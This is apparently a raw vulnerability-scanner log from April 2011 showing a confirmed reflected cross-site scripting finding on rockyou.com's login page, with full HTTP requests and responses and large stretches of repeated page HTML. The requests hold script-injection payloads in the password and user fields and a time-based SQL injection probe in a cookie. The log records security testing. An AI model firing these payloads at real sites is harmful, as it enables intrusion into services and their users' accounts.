document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'><script>netsparker(9)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'><script>netsparker(9)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><optio..
Date: Mon, 18 Apr 2011 22:25:56 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=-1; expires=Mon, 18-Apr-2011 12:25:56 GMT; path=/; domain=.rockyou.com,lastlogin=1303165556; expires=Wed, 27-Jul-2011 22:25:56 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:25:56 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=96762 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9101
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="\'><script>netsparker(9)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:none"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="\'><script>netsparker(9)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><optio..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| birthyear | GET | 3 |
| country | GET | 0 |
| flixster | GET | 3 |
| mode | GET | create |
| pass | GET | 3 |
| postalcode | GET | 3 |
| sex | GET | 3 |
| source | GET | 3 |
| toscheck | GET | 1 |
| user | GET | 3 |
| pass | POST | "><script>alert(9)</script> |
| user | POST | 3 |
| mode | POST | create |
| source | POST | 3 |
| flixster | POST | 3 |
| toscheck | POST | 1 |
| birthyear | POST | 3 |
| sex | POST | 3 |
| country | POST | 0 |
| postalcode | POST | 3 |
Request
POST /login.php?lang=en&birthyear=3&country=0&flixster=3&mode=create&pass=3&postalcode=3&sex=3&source=3&toscheck=1&user=3 HTTP/1.1
Referer: http://www.rockyou.com/login.php?lang=en&birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165642; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Content-Length: 142
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass=%22%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&user=3&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Referer: http://www.rockyou.com/login.php?lang=en&birthyear=&country=0&flixster=&mode=create&pass=&postalcode=&sex=&source=&toscheck=1&user=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303165642; ctid=3; sns_type=rockyou.com; istack=158777336%7Cwww202.rockyou.com%7C%7C158777337%7Cwww202.rockyou.com%7C%7C158777339%7Cwww202.rockyou.com%7C%7C158777341%7Cwww202.rockyou.com%7C%7C158777342%7Cwww202.rockyou.com%7C%7C158777345%7Cwww202.rockyou.com%7C%7C158777346%7Cwww202.rockyou.com%7C%7C158777348%7Cwww202.rockyou.com%7C%7C158777349%7Cwww202.rockyou.com%7C%7C158777351%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--
Content-Length: 142
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass=%22%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&user=3&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:27:22 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:27:21 GMT; path=/; domain=.rockyou.com,lastlogin=1303165642; expires=Wed, 27-Jul-2011 22:27:22 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:27:22 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=91131 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9107
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\"><script>netsparker(9)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><option value="1911">1911<..
Date: Mon, 18 Apr 2011 22:27:22 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:27:21 GMT; path=/; domain=.rockyou.com,lastlogin=1303165642; expires=Wed, 27-Jul-2011 22:27:22 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:27:22 GMT; path=/; domain=.rockyou.com
